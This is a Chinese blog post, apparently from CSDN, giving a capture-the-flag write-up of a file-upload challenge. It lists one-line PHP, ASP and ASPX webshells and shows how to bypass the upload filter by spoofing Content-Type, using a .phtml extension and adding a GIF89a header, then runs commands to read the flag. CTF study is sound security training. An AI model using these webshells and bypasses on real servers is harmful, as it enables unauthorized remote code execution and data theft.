极客大挑战2019Upload 1:

 文件上传漏洞(一句话木马):http://t.csdn.cn/vviKs

文件头绕过:http://t.csdn.cn/h1t8G

首先是常见的一句话木马:

php: <?php @eval($_POST['pass']);?>、<?php system($_GET['cmd']);?>
asp: <%eval request ("pass")%>
aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

本题首先尝试的一句话木马为<?php system($_GET['cmd']);?>

在上传时进行抓包

再右键send to repeater

发现返回 Not Image所以我们将Content-Type一栏改为image/jpeg,再继续发送发现返回Not php所以我们将filename一项后面的文件后缀由.php改为.phtml继续发送返回

尝试将一句话木马<?php system($_GET['cmd']);?>    改为    <%php system($_GET['cmd']);%>发现返回

在一句话木马上方加上GIF89a?进行文件头绕过

上传成功但是查看发现一句话木马并未被成功执行

去看了一位大佬的视频尝试换一种一句话木马

<script language="php">eval($_GET['cmd']);</script>

上传成功

在url中的phtml后执行代码?cmd=system("ls /");

发现flag利用?cmd=system("cat /flag");

得到flag为: flag{ae76cb1d-5cbc-48ce-a709-cac5d285358a}

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值